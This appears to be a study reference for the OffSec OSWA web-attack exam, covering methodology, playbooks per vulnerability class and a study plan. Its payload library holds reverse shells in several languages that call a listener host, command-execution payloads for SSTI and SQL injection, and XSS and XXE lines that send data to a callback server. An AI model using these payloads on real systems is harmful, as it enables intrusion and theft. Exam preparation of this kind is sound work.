WEB-200 / OSWA

5 targets10 flags / 10070 to pass23h 45m24h reportopen book
Exam facts checked 2026-08-25. Recheck OffSec before exam day.

CHECKLISTS

METHODOLOGY

Grab methodology .md ↓
01

00 · Prepare and preserve

  • Read the current exam guide, restrictions, proof rules, and target-specific control-panel objectives.
  • Confirm Kali, OpenVPN, browser, proxy certificate, terminal, screenshot tool, clock, disk space, and report template.
  • Create one notes folder and one evidence folder per target; start a command log before enumeration.
  • Record the VPN interface address and prepare callback variables for web servers, listeners, and out-of-band tests.
  • Bookmark the current official exam guide and this online reference; download the Markdown checklists you want in your own notes.
  • Start the report immediately. Do not rely on memory after a long exploitation chain.
02

01 · Map the application

  • Run focused host and service enumeration; note every HTTP and HTTPS port, title, redirect, certificate name, and technology clue.
  • Add required virtual hosts to /etc/hosts and repeat discovery against each hostname and port.
  • Browse every public feature through the proxy and record methods, paths, parameters, cookies, forms, APIs, uploads, and error behavior.
  • Discover directories, files, extensions, virtual hosts, parameters, parameter values, and backup artifacts with controlled wordlists.
  • Inspect HTML, JavaScript, source maps, comments, robots.txt, API documentation, and client-side requests for hidden routes.
  • Draw the authentication boundary: registration, login, reset, logout, session renewal, roles, administrator routes, and emulated-user entry points.
  • Create an input inventory covering path, query, form, JSON, XML, header, cookie, filename, file content, object ID, URL, and stored content.
  • Save clean baseline requests and responses for important features before mutation.
03

02 · Classify and prioritize

  • Classify each input as browser-rendered, database-consumed, filesystem-related, XML-parsed, template-rendered, command-adjacent, URL-fetched, or object-referencing.
  • Prioritize stored inputs visited by administrators, administrative actions, file or URL features, search/filter fields, import/export, and object identifiers.
  • For every promising input, record the source, transformations, sink, user context, and expected security boundary.
  • Rank hypotheses by ability to reach an administrator session, local.txt, file access, command execution, a shell, or proof.txt.
  • Define the smallest harmless probe that can confirm or reject each hypothesis.
  • Track negative results with the exact context and encoding used so failed tests are not repeated blindly.
04

03 · Confirm the primitive manually

  • Change one thing at a time and compare status, length, headers, body, timing, side effects, and subsequent requests.
  • Use delimiters, arithmetic, timing, callbacks, object swaps, or harmless file reads appropriate to the suspected sink.
  • Reproduce the signal at least twice and rule out caching, unstable content, proxy errors, and normal application behavior.
  • Identify the exact execution context, operating system, database dialect, template engine, parser, role, or URL parser where possible.
  • Save the minimum confirming request, response, command, and screenshot.
  • Only after manual confirmation, hand off repetitive enumeration to approved tools such as SQLMap, Tplmap, Wfuzz, or a proxy fuzzer.
05

04 · Escalate and chain

  • Ask whether the primitive runs in an administrator browser, application process, database, internal service, or another user's authorization context.
  • For browser-side execution, target the administrator session or a same-origin administrative action and verify the resulting role.
  • For database or server-side execution, enumerate the minimum information needed to reach file read, file write, command execution, or a shell.
  • For authorization issues, test horizontal and vertical operations across read, create, update, delete, file access, and administrative endpoints.
  • For SSRF and XXE, enumerate reachable local services and files methodically; do not confuse callback confirmation with objective completion.
  • Prefer short, reproducible chains. Record every dependency and transformation between source and final sink.
  • After a shell, locate proof.txt from its expected original location; privilege escalation is not required for OSWA.
06

05 · Capture evidence immediately

  • Submit local.txt and proof.txt values to the Exam Control Panel before the active exam ends.
  • For a web UI proof, capture the actual target browser view and the relevant request in Burp or another proxy.
  • For a shell proof, capture cat or type reading the file from its original location with target context visible.
  • Record commands, full requests, relevant responses, console output, payload hosting, listener setup, and every prerequisite step.
  • Use meaningful screenshot filenames and add them to the report while the chain is fresh.
  • Reproduce the chain from a clean session or clean target state before marking the target complete.
  • Confirm that another technically competent tester could repeat the result using only the report.
07

06 · Validate and submit

  • Calculate documented points, not merely discovered vulnerabilities; train for at least eight evidenced flags.
  • Review every target against its control-panel objective and verify every required screenshot is embedded.
  • Include scripts and PoCs as text in the PDF; do not rely on separate files inside the archive.
  • Render and review the final PDF for clipped commands, broken images, missing pages, and unreadable screenshots.
  • Name the PDF and .7z exactly as required, preserve case, do not password-protect the archive, and keep it under 200 MB.
  • Upload within the documentation window and compare the returned MD5 with the local archive hash.
  • Retain the final PDF, archive, checksum, and upload confirmation until results are received.

PLAYBOOKS

01browser
Download checklist ↓

Cross-site scripting

DETECT

  • Input reappears in HTML, attributes, script blocks, URLs, DOM nodes, templates, previews, logs, messages, profiles, or administrator queues.
  • The browser changes the DOM after load using location, hash, query, postMessage, localStorage, or API data.
  • Stored content is later viewed by a higher-privileged or emulated user.

TEST

  1. Locate the exact reflection or storage point and determine whether rendering is server-side or client-side.
  2. Identify the context: HTML text, quoted/unquoted attribute, JavaScript string, URL, CSS, or DOM sink.
  3. Use a harmless marker, then a context-appropriate execution proof. Avoid assuming a popup is the final objective.
  4. Check encoding, sanitization, CSP, cookie HttpOnly/SameSite flags, and whether same-origin requests remain possible.
  5. For an emulated administrator, host the smallest reliable callback payload and confirm the visit.
  6. Use same-origin access or requests to reach the administrator area, then capture local.txt with the required browser/proxy evidence.

CHAIN

  • Read non-HttpOnly cookies or browser storage only when the application actually keeps useful secrets there.
  • If cookies are protected, use JavaScript running in the victim origin to perform administrative actions or read same-origin responses.
  • Keep the callback and exfiltration path observable in your notes; distinguish the first hit from successful authenticated action.

FUCKUPS

  • Testing only a generic script tag without identifying the output context.
  • Ignoring DOM/client-side flows because the raw response does not contain the payload.
  • Treating JavaScript execution as completion without obtaining the requested administrator objective.
  • Using a listener address that the target cannot reach or serving a payload with the wrong MIME type.

EVIDENCE

  • Vulnerable request and rendered response
  • Exact context and payload
  • Callback or administrator visit
  • Authenticated administrator view
  • local.txt browser and proxy screenshots

TOOLS

  • Burp/ZAP HTTP history and resend
  • Browser developer tools
  • Python HTTP server or equivalent callback host
  • Access log and listener
02browser
Download checklist ↓

CSRF, SOP, SameSite, and CORS

DETECT

  • State-changing requests rely only on cookies and lack an unpredictable request-bound token.
  • Origin is reflected into Access-Control-Allow-Origin or weakly checked by prefix/suffix.
  • Credentialed cross-origin responses are permitted to an attacker-controlled origin.
  • A privileged user predictably visits attacker-controlled content.

TEST

  1. Record method, content type, cookies, CSRF token, Origin/Referer behavior, redirects, and response requirements.
  2. Remove or alter each anti-CSRF control independently and verify whether the state change still succeeds.
  3. Determine whether a simple form is sufficient or JavaScript/CORS is required.
  4. For CORS, vary Origin using exact attacker origins, null, scheme/port changes, subdomains, prefixes, and suffixes.
  5. Confirm both browser acceptance and credential inclusion; permissive response headers alone may not be exploitable.
  6. Chain the cross-origin primitive into an administrative read or state change that exposes the exam objective.

CHAIN

  • Use CSRF for blind privileged state changes such as adding an account, changing an email, or modifying content.
  • Use exploitable credentialed CORS when the attacker origin can read sensitive responses.
  • Combine stored XSS or an emulated-user visit with the cross-origin action when direct delivery is required.

FUCKUPS

  • Calling a wildcard ACAO exploitable when credentials are required.
  • Ignoring SameSite behavior and top-level navigation differences.
  • Testing with a request tool instead of confirming actual browser enforcement.
  • Failing to verify the privileged side effect.

EVIDENCE

  • Original privileged request
  • Removed/bypassed control
  • Browser-deliverable PoC
  • Privileged side effect or readable response
  • Administrator objective

TOOLS

  • Burp/ZAP Repeater or Requester
  • Browser console and network panel
  • Local HTML PoC
  • HTTP callback server
03server
Download checklist ↓

SQL injection

DETECT

  • Quotes, parentheses, comments, type changes, sorting expressions, or boolean conditions change the response.
  • Database error text, column names, SQL fragments, or consistent timing differences appear.
  • Search, filter, sort, ID, login, report, or JSON parameters influence database-backed content.

TEST

  1. Establish a stable baseline and identify whether the value is numeric, string, list, identifier, ORDER BY, or function input.
  2. Balance quotes and parentheses; test true/false conditions and native comments without combining many mutations.
  3. Identify MySQL, PostgreSQL, MSSQL, or Oracle through errors, functions, concatenation, timing, and metadata behavior.
  4. Count columns with ORDER BY or UNION NULLs and identify visible compatible columns.
  5. Enumerate current database/user, schemas, tables, columns, and only the data required for the objective.
  6. Evaluate stacked queries, file read/write, database-specific command execution, or web-shell placement.
  7. After manual confirmation, use SQLMap narrowly with a saved request and known parameter when it reduces repetitive work.

CHAIN

  • Authentication bypass or administrative credential recovery may lead directly to local.txt.
  • File read can reveal configuration, source, credentials, or writable web roots.
  • File write, stacked queries, MSSQL execution features, or database extensions may lead to a shell and proof.txt.

FUCKUPS

  • Launching SQLMap before understanding the request, parameter, session, CSRF behavior, or query context.
  • Using a UNION with the wrong column count or incompatible data types and concluding the input is safe.
  • Assuming all database dialects share comments, concatenation, metadata tables, or file capabilities.
  • Dumping everything instead of pursuing the shortest objective path.

EVIDENCE

  • True/false or error confirmation
  • Dialect identification
  • Working enumeration query
  • Administrative or RCE transition
  • Original-location proof screenshot

TOOLS

  • Burp/ZAP manual resend
  • Wfuzz or proxy fuzzer
  • SQLMap after confirmation
  • Dialect reference and UNION workbench
04server
Download checklist ↓

Directory traversal and file access

DETECT

  • Parameters resemble file, page, template, language, theme, download, document, image, path, or directory names.
  • Changing a value produces file-not-found, absolute-path, include, or directory-listing errors.
  • A route returns server files or accepts a filename independent of an object authorization check.

TEST

  1. Determine the expected base directory, filename, extension, prefix, suffix, and whether the application accepts absolute paths.
  2. Test a known application file before distant operating-system paths so success is measurable.
  3. Increase traversal depth methodically and test Unix/Windows separators appropriate to the target.
  4. Evaluate URL encoding, double encoding, mixed separators, normalized dot segments, and validated-versus-used path differences.
  5. Test whether an enforced suffix can be bypassed or whether the desired file already matches it.
  6. Use controlled path wordlists only after learning the path grammar.
  7. Read configuration or source material that advances authentication, command execution, or the requested proof.

CHAIN

  • Application source reveals hidden routes, secrets, database access, templates, and command construction.
  • Configuration and environment files may provide administrator credentials or internal service locations.
  • Log or file inclusion may become code execution only when the application actually interprets the included content.

FUCKUPS

  • Using a fixed traversal depth without learning the working directory.
  • Ignoring URL decoding performed by a proxy, framework, or front-end before application validation.
  • Confusing an application-level download authorization issue with filesystem traversal.
  • Claiming file access from an error without retrieving controlled or known content.

EVIDENCE

  • Baseline file request
  • Working traversal grammar
  • Known file contents
  • Sensitive file that advances the chain
  • Resulting administrator or server proof

TOOLS

  • Burp/ZAP resend and decoder
  • Wfuzz path fuzzing
  • curl --path-as-is
  • SecLists traversal lists used selectively
05server
Download checklist ↓

XML external entity injection

DETECT

  • Endpoints accept XML, SOAP, SVG, office-like documents, imports, feeds, or content-type changes from JSON/form data.
  • Malformed XML returns parser names, line numbers, entity errors, or expanded values.
  • An import or conversion feature processes user-supplied structured documents.

TEST

  1. Preserve a valid baseline document and modify the smallest possible element.
  2. Confirm entity expansion with a harmless internal entity before referencing local files or URLs.
  3. Try in-band external entities when response data is reflected.
  4. Use error-based or external-DTD techniques when direct output is unavailable.
  5. Use a controlled callback to confirm blind retrieval and record DNS versus HTTP behavior.
  6. Select files compatible with the parser and output context; binary or markup-heavy files may fail.
  7. Chain file or network access to credentials, internal services, administrator access, or server execution.

CHAIN

  • Read application configuration, source, environment, and service credentials.
  • Reach localhost or internal HTTP services using external entity URLs.
  • Use out-of-band retrieval when the parser can connect outward but the response is not reflected.

FUCKUPS

  • Breaking the document before reaching the parser.
  • Assuming all parsers allow DOCTYPE, external general entities, parameter entities, and network requests equally.
  • Using a file whose characters make the XML response invalid.
  • Recording a callback without proving which request caused it.

EVIDENCE

  • Valid baseline XML
  • Internal expansion proof
  • External file or callback proof
  • Parser-specific payload
  • Chain to objective

TOOLS

  • Burp/ZAP content-type and body editing
  • Python HTTP server
  • Listener logs
  • XML syntax reference
06server
Download checklist ↓

Server-side template injection

DETECT

  • Arithmetic or expression syntax evaluates inside generated pages, emails, previews, names, themes, CMS content, or translation features.
  • Errors mention template syntax, filters, classes, engine names, undefined variables, or sandbox restrictions.
  • The same value renders differently in preview and saved output.

TEST

  1. Use harmless arithmetic probes in multiple syntaxes and compare evaluated output with literal reflection.
  2. Fingerprint Twig, Jinja, FreeMarker, Pug, Mustache, or Handlebars through syntax collisions and error language.
  3. Map the rendering context, available variables, filters, functions, objects, and sandbox behavior.
  4. Consult the exact engine/version documentation and construct the shortest engine-specific path.
  5. Confirm low-impact server-side access before invoking operating-system commands.
  6. Select a shell payload compatible with the server runtime and network reachability.
  7. Record each object or function transition; template-engine payloads are brittle without context.

CHAIN

  • Read configuration or environment values exposed to the template.
  • Reach language runtime objects, process APIs, or command helpers when the engine exposes them.
  • Write a web shell or obtain a callback shell, then capture proof.txt.

FUCKUPS

  • Assuming {{7*7}} uniquely identifies Jinja or Twig.
  • Using payloads from a different engine, version, sandbox, or framework integration.
  • Confusing client-side templates with server-side evaluation.
  • Skipping intermediate confirmation and debugging only the final reverse shell.

EVIDENCE

  • Literal-versus-evaluated proof
  • Engine fingerprint
  • Accessible object/function
  • Command output or callback
  • proof.txt from original location

TOOLS

  • Burp/ZAP resend
  • SSTI fingerprint workbench
  • Tplmap after manual confirmation
  • Engine documentation
07server
Download checklist ↓

Operating-system command injection

DETECT

  • Features invoke ping, DNS, archive, image, document, backup, diagnostic, build, converter, or administrative utilities.
  • Separators, substitution, quoting, or delay commands change output or timing.
  • Errors expose shell syntax, executable paths, command arguments, or process failures.

TEST

  1. Determine operating system, shell, command location, argument position, quoting, normalization, and allowed characters.
  2. Try one appropriate separator or substitution construct with a harmless command.
  3. When output is hidden, confirm with deterministic delay and then a controlled callback.
  4. Enumerate identity, working directory, environment, available interpreters, egress, and writable locations.
  5. Choose a callback payload for an installed runtime rather than cycling random reverse shells.
  6. Transfer files only when needed and keep every hosted artifact in the evidence log.
  7. Upgrade the shell enough to navigate and read proof.txt; privilege escalation is not required.

CHAIN

  • Direct command output can retrieve proof without a reverse shell when the objective and screenshot rules are satisfied.
  • Blind execution can download or invoke a short callback payload from your controlled HTTP server.
  • Writable web roots may allow a web shell when outbound callbacks fail.

FUCKUPS

  • Combining separators, encodings, and shell syntax before learning which character is blocked.
  • Using bash-specific syntax when /bin/sh or Windows cmd is executing.
  • Debugging a listener when the actual problem is quoting or target egress.
  • Forgetting to screenshot proof from its original location.

EVIDENCE

  • Harmless direct/timing confirmation
  • Execution context enumeration
  • Listener and target command
  • Stable shell or direct file read
  • Original-location proof

TOOLS

  • Burp/ZAP resend and fuzzer
  • curl or Python HTTP server
  • nc/socat listener
  • Reverse-shell generator
08server
Download checklist ↓

Server-side request forgery

DETECT

  • Features import URLs, generate previews, fetch images, validate webhooks, render PDFs, check links, proxy APIs, or accept callback destinations.
  • A controlled server receives a request with headers or source addresses different from the browser.
  • Supplying localhost, private IPs, or alternate schemes changes status, body, timing, or error text.

TEST

  1. Use a unique callback path to prove the exact input causes a server-side request.
  2. Record method, headers, DNS behavior, redirects, URL parsing, response reflection, and whether the server follows redirects.
  3. Test loopback and likely internal services using controlled port and path hypotheses.
  4. Evaluate alternate host representations, scheme confusion, userinfo, fragments, redirects, and validation-versus-fetch parser differences.
  5. Distinguish blind reachability using timing or callbacks from content-retrieving SSRF.
  6. Interact with internal administrative or unauthenticated microservice endpoints using the supported method and body.
  7. Pursue cloud metadata only when environment clues support it and remain within the authorized target.

CHAIN

  • Bypass network-based trust or authentication on localhost/internal services.
  • Read internal API responses, configuration endpoints, or metadata credentials when reflected.
  • Chain internal access into administrator actions, file access, or code execution.

FUCKUPS

  • Mistaking a browser request for a server request.
  • Scanning enormous private ranges instead of using application and error clues.
  • Generating IP encodings without checking whether the actual URL parser accepts them.
  • Stopping at a callback rather than reaching an exam objective.

EVIDENCE

  • Unique callback request
  • Server-fetch characteristics
  • Internal destination evidence
  • Privileged internal response/action
  • Resulting objective

TOOLS

  • Controlled HTTP/DNS callback
  • Burp/ZAP resend
  • SSRF representation workbench
  • Nmap only against authorized exam targets as allowed
09authorization
Download checklist ↓

IDOR and broken object authorization

DETECT

  • Requests contain numeric IDs, UUIDs, filenames, account names, nested object references, opaque tokens, or owner fields.
  • The UI hides an operation but the endpoint remains callable.
  • Responses differ when changing identity, method, path, body, content type, or object relationship.

TEST

  1. Use two controlled accounts and label every session clearly in the proxy.
  2. Create one object per account and record identifiers returned in paths, bodies, headers, links, and filenames.
  3. Build a matrix for read, list, create, update, delete, download, share, and administrative operations.
  4. Replay account A's request with account B's session while changing only the target object reference.
  5. Test nested IDs, secondary identifiers, batch endpoints, alternate methods, content types, and direct file URLs.
  6. Verify both the HTTP response and persistent side effect as the affected account.
  7. Test vertical access to administrator objects and functions without relying only on predictable IDs.

CHAIN

  • Read or modify an administrator-owned object that exposes an administrator feature or secret.
  • Use unauthorized sharing, ownership transfer, role update, or file access to cross the administrative boundary.
  • Combine IDOR with stored content, file features, or server-side processing to reach another vulnerability class.

FUCKUPS

  • Testing with only one account and assuming an object belongs to someone else.
  • Changing the object ID and session at the same time, making the result ambiguous.
  • Treating a 200 response as success without checking the returned object or side effect.
  • Ignoring filenames, UUIDs, nested resources, and bulk operations because IDs are not sequential.

EVIDENCE

  • Ownership setup for both accounts
  • Original authorized request
  • Single-variable unauthorized replay
  • Victim-side verification
  • Administrator objective

TOOLS

  • Burp/ZAP session labels and resend
  • IDOR matrix
  • Browser profiles or containers
  • Response diff workbench

ATTACK CHAINS

Stored XSS → administrator

  1. Stored input reaches emulated administrator
  2. Context-specific JavaScript executes
  3. Same-origin session or action is obtained
  4. Administration area is opened
  5. local.txt is captured with browser and proxy evidence

Traversal → authentication bypass

  1. Path parameter escapes base directory
  2. Application source/configuration is read
  3. Credential or session secret is recovered
  4. Administrator login/session is obtained
  5. local.txt is captured

SQLi → shell

  1. Manual SQL control is confirmed
  2. Dialect and query shape are identified
  3. File/command capability is established
  4. Callback or web shell executes
  5. proof.txt is read from its original location

SSTI → shell

  1. Server-side evaluation is proven
  2. Template engine is fingerprinted
  3. Runtime object/function access is found
  4. Operating-system command executes
  5. Shell retrieves proof.txt

SSRF → internal administration

  1. Unique server-side callback is recorded
  2. Loopback/internal service is identified
  3. Network-based trust is bypassed
  4. Privileged internal endpoint is invoked
  5. Administrator or server objective is captured

IDOR → administrator object

  1. Two-account ownership matrix is built
  2. Authorization failure is reproduced
  3. Administrator-owned object/action is reached
  4. Administrative access or secret is obtained
  5. local.txt is captured

PAYLOADS

mapping12 entries
commandnmapportsservices

Focused full TCP scan

sudo nmap -Pn -p- --min-rate 1000 -oA scans/all-tcp {{TARGET}}
commandnmaphttptitles

HTTP service scripts

nmap -Pn -sV -p 80,443,8000,8080,8443 --script http-title,http-headers,http-methods -oA scans/http {{TARGET}}
commandgobusterdirectoriesextensions

Gobuster content discovery

gobuster dir -u http://{{HOST}}/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html,bak,old,zip -t 20 -o gobuster.txt
commandgobustervhosthostname

Gobuster virtual hosts

gobuster vhost -u http://{{HOST}}/ --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20
commandwfuzzparametersbaseline

Wfuzz parameter discovery

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh 0 'http://{{HOST}}/page?FUZZ=test'
commandwfuzzpostvalues

Wfuzz POST value testing

wfuzz -c -z file,values.txt -d 'parameter=FUZZ' --hc 404 'http://{{HOST}}/endpoint'
commandhakrawlercrawljavascript

Hakrawler endpoint crawl

echo 'http://{{HOST}}/' | hakrawler -depth 3 -js -subs -plain | tee hakrawler.txt
commandcurljsonapi

JSON request with curl

curl -isk 'http://{{HOST}}/api/endpoint' -H 'Content-Type: application/json' --data '{"parameter":"value"}'
commandcurlxmlapi

XML request with curl

curl -isk 'http://{{HOST}}/api/endpoint' -H 'Content-Type: application/xml' --data-binary @request.xml
commandcurlpathtraversal

Preserve unusual paths with curl

curl -isk --path-as-is 'http://{{HOST}}/download?file=../../../../etc/passwd'
commandpythonhttpcallback

Serve callbacks and payloads

python3 -m http.server 8000 --bind {{LHOST}}
commandnetcatshellcallback

Listener

rlwrap nc -lvnp {{LPORT}}
sqli13 entries
commandsqlmaprequestmanual-first

SQLMap from captured request

sqlmap -r request.txt -p vulnerable_parameter --batch --level=3 --risk=2
commandsqlmapenumeration

SQLMap current context

sqlmap -r request.txt -p vulnerable_parameter --current-user --current-db --hostname --batch
payloadquotediscovery

String boundary probes

'  "  ')  "")
payloadbooleanmanual

Boolean comparison

' AND 1=1-- -    |    ' AND 1=2-- -
payloadcolumnsmanual

ORDER BY column count

' ORDER BY 1-- -   then increment until the response changes
payloadunioncolumns

UNION NULL scaffold

' UNION SELECT NULL,NULL,NULL-- -
payloadmysqlenumeration

MySQL identity

' UNION SELECT NULL,concat(user(),0x3a,database()),NULL-- -
payloadpostgresenumeration

PostgreSQL identity

' UNION SELECT NULL,current_user||':'||current_database(),NULL-- -
payloadmssqlenumeration

MSSQL identity

' UNION SELECT NULL,SYSTEM_USER+':'+DB_NAME(),NULL-- -
payloadoracleenumeration

Oracle identity

' UNION SELECT NULL,USER||':'||SYS_CONTEXT('USERENV','DB_NAME'),NULL FROM dual-- -
payloadmysqlfile-read

MySQL file read

' UNION SELECT NULL,LOAD_FILE('/etc/hostname'),NULL-- -
payloadmssqlxp_cmdshellrce

MSSQL command execution check

'; EXEC master..xp_cmdshell 'whoami';-- -
payloadpostgrescopyrce

PostgreSQL program execution pattern

'; CREATE TEMP TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -
ssti9 entries
commandtplmaptemplatemanual-first

Tplmap after manual confirmation

python3 tplmap.py -r request.txt -p vulnerable_parameter
payloadfingerprintharmless

Arithmetic fingerprint set

{{7*7}}  |  ${7*7}  |  <%= 7*7 %>  |  #{7*7}
payloadtwigjinjafingerprint

Twig/Jinja collision probe

{{7*'7'}} — Jinja commonly returns 7777777; Twig commonly returns 49
payloadfreemarkerfingerprint

FreeMarker arithmetic

${7*7}
payloadpugfingerprint

Pug interpolation

#{7*7}
payloadjinjapythonrce

Jinja command-output pattern

{{cycler.__init__.__globals__.os.popen('id').read()}}
payloadtwigphprceversion-specific

Twig command-output pattern

{{['id']|filter('system')}}
payloadfreemarkerjavarce

FreeMarker command-output pattern

${"freemarker.template.utility.Execute"?new()("id")}
payloadpugnoderceintegration-specific

Pug command-output pattern

#{global.process.mainModule.require('child_process').execSync('id')}
traversal7 entries
commandwfuzzfile-readencoding

Traversal fuzzing

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hh 0 'http://{{HOST}}/download?file=FUZZ'
payloadlinuxrelative

Unix relative traversal

../../../../../../etc/passwd
payloadwindowsrelative

Windows relative traversal

..\..\..\..\Windows\win.ini
payloadencodingfilter

URL-encoded traversal

..%2f..%2f..%2f..%2fetc%2fpasswd
payloaddouble-encodingfilter

Double-encoded traversal

..%252f..%252f..%252fetc%252fpasswd
payloadlinuxfiles

Common Linux application targets

/proc/self/environ | /proc/self/cmdline | /etc/hosts | application config/source
payloadwindowsfiles

Common Windows targets

C:\Windows\win.ini | C:\Windows\System32\drivers\etc\hosts | application config
command injection14 entries
commandshellcallbackworkflow

Shell listener plus web server

tmux new-session -d -s oswa-listener 'nc -lvnp {{LPORT}}' && python3 -m http.server 8000 --bind {{LHOST}}
commandshellptystabilize

Upgrade a basic Unix shell

python3 -c 'import pty; pty.spawn("/bin/bash")'  # then Ctrl-Z; stty raw -echo; fg; reset
commandfile-transferlinuxcurl

Download from Kali with curl

curl http://{{LHOST}}:8000/tool -o /tmp/tool && chmod +x /tmp/tool
commandfile-transferwindowspowershell

Download from Kali with PowerShell

powershell -c "iwr http://{{LHOST}}:8000/tool.exe -OutFile $env:TEMP\tool.exe"
payloadlinuxdiscovery

Unix separator probes

;id  |  && id  |  || id  |  | id  |  $(id)
payloadwindowsdiscovery

Windows separator probes

& whoami  |  && whoami  |  || whoami  |  | whoami
payloadblindlinuxtiming

Unix timing confirmation

; sleep 5
payloadblindwindowstiming

Windows timing confirmation

& ping -n 6 127.0.0.1
payloadlinuxbashshell

Bash TCP shell

bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'
payloadlinuxpythonshell

Python 3 shell

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{{LHOST}}",{{LPORT}}));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/sh")'
payloadlinuxphpshell

PHP shell

php -r '$s=fsockopen("{{LHOST}}",{{LPORT}});exec("/bin/sh -i <&3 >&3 2>&3");'
payloadlinuxnodeshell

Node.js shell

node -e "const n=require('net'),c=require('child_process'),s=n.connect({{LPORT}},'{{LHOST}}',()=>{const sh=c.spawn('/bin/sh',[]);s.pipe(sh.stdin);sh.stdout.pipe(s);sh.stderr.pipe(s)})"
payloadlinuxperlshell

Perl shell

perl -e 'use Socket;$i="{{LHOST}}";$p={{LPORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
payloadwindowspowershellshell

PowerShell TCP shell pattern

powershell -NoP -W Hidden -c "$c=New-Object Net.Sockets.TCPClient('{{LHOST}}',{{LPORT}});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$o=([Text.Encoding]::ASCII).GetBytes($r+'PS '+(pwd).Path+'> ');$s.Write($o,0,$o.Length)};$c.Close()"
reporting4 entries
command7zsubmissionreport

Create final archive

7z a OSWA-OS-XXXXX-Exam-Report.7z OSWA-OS-XXXXX-Exam-Report.pdf
commandmd5submissionverify

Verify archive checksum

md5sum OSWA-OS-XXXXX-Exam-Report.7z
commandscreenshotlocal.txt

Web UI proof rule

Capture the proof value on the actual target in the browser plus the associated request in Burp Suite or another web proxy.
commandscreenshotproof.txt

Shell proof rule

Use cat or type to display the proof file from its original location and capture the command, value, and target context.
xss6 entries
payloadreflectedstoredhtml

HTML text-context probe

<img src=x onerror=alert(document.domain)>
payloadattributecontext

Attribute-breakout probe

"><svg onload=alert(document.domain)>
payloademulated-usercallbackstored

External script loader

<script src=http://{{LHOST}}:8000/payload.js></script>
payloadcallbackblind

Simple callback beacon

fetch('http://{{LHOST}}:8000/hit?o='+encodeURIComponent(location.origin))
payloadadminsame-originsession

Same-origin administrative fetch pattern

fetch('/admin',{credentials:'include'}).then(r=>r.text()).then(t=>fetch('http://{{LHOST}}:8000/result',{method:'POST',body:t}))
payloadlocalStoragesessionStoragesecrets

Browser storage inventory

JSON.stringify({local:{...localStorage},session:{...sessionStorage}})
cross origin4 entries
payloadcorsorigin

Origin test

Origin: https://attacker.example
payloadcorsnull

Null-origin test

Origin: null
payloadcsrfpostform

Simple CSRF form pattern

<form action="http://{{HOST}}/admin/action" method="POST"><input name="value" value="test"></form>
payloadcorscredentialsread

Credentialed CORS read pattern

fetch('http://{{HOST}}/admin',{credentials:'include'}).then(r=>r.text()).then(console.log)
xxe5 entries
payloadxmlharmlessdiscovery

Internal entity confirmation

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY test "OSWA_ENTITY">]><r>&test;</r>
payloadxmlfile-readlinux

Unix file entity

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><r>&xxe;</r>
payloadxmlfile-readwindows

Windows file entity

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]><r>&xxe;</r>
payloadxmlblindcallback

HTTP callback entity

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "http://{{LHOST}}:8000/xxe">]><r>&xxe;</r>
payloadxmlblindparameter-entity

External DTD loader

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM "http://{{LHOST}}:8000/external.dtd">%ext;]><r>test</r>
ssrf5 entries
payloaddiscoverycallback

Unique callback

http://{{LHOST}}:8000/ssrf-unique-token
payloadlocalhostfilter

Loopback representations

http://127.0.0.1/ | http://localhost/ | http://127.1/ | http://2130706433/
payloadipv6localhost

IPv6 loopback

http://[::1]/
payloadparserbypass

URL userinfo parser probe

http://allowed.example@127.0.0.1/
payloadcloudmetadatasituational

Cloud metadata candidates

Only when environment clues support it: AWS 169.254.169.254, GCP metadata.google.internal, Azure 169.254.169.254/metadata
idor2 entries
payloadinventoryauthorization

Object reference locations

Path | query | JSON/body | header | cookie | filename | nested ID | batch array | redirect/location
payloadtwo-accountmethodology

Operation matrix

Account A session + A object; Account B session + A object; test GET/POST/PUT/PATCH/DELETE/download/share
zap1 entries
commandzapproxyrequester

ZAP manual workflow

History → select request → Open/Resend with Request Editor → change one value → compare response → save raw message/evidence
burp1 entries
commandburpproxyrepeater

Burp Community manual workflow

Proxy HTTP history → Send to Repeater → change one value → Send → compare status/length/body/timing → save request and screenshot

STUDY PLAN

Grab study plan .md ↓
Week 1

Tools, proxy workflow, Nmap, wordlists, Gobuster, Wfuzz, crawling, shells, and XSS discovery

Gate: Map a fresh application and explain every captured request.

Week 2

XSS exploitation, JavaScript APIs, stored/emulated-user paths, evidence

Gate: Turn context-specific XSS into a reliable callback and same-origin action.

Week 3

Same-origin policy, SameSite, CSRF, CORS, browser enforcement

Gate: Build browser-deliverable CSRF and distinguish weak from exploitable CORS.

Week 4

SQL fundamentals across MySQL, PostgreSQL, MSSQL, and Oracle

Gate: Write manual schema queries without copying a database dump recipe.

Week 5

SQLi discovery, UNION, errors, stacked queries, file access, SQLMap handoff

Gate: Manually confirm and enumerate before running SQLMap.

Week 6

Directory traversal, normalization, encoding, Unix and Windows file targets

Gate: Derive a working traversal from the application's path grammar.

Week 7

XML and XXE: in-band, error-based, out-of-band

Gate: Prove entity expansion and retrieve a controlled file or callback.

Week 8

SSTI fingerprinting across Twig, FreeMarker, Pug, Jinja, Mustache, Handlebars

Gate: Identify an engine from behavior and explain each escalation step.

Week 9

Command injection, filters, blind confirmation, shells, transfer

Gate: Obtain a callback using a runtime you first proved exists.

Week 10

SSRF, URL parsing, internal services, microservice trust, metadata

Gate: Differentiate server callback, blind reachability, and readable SSRF.

Week 11

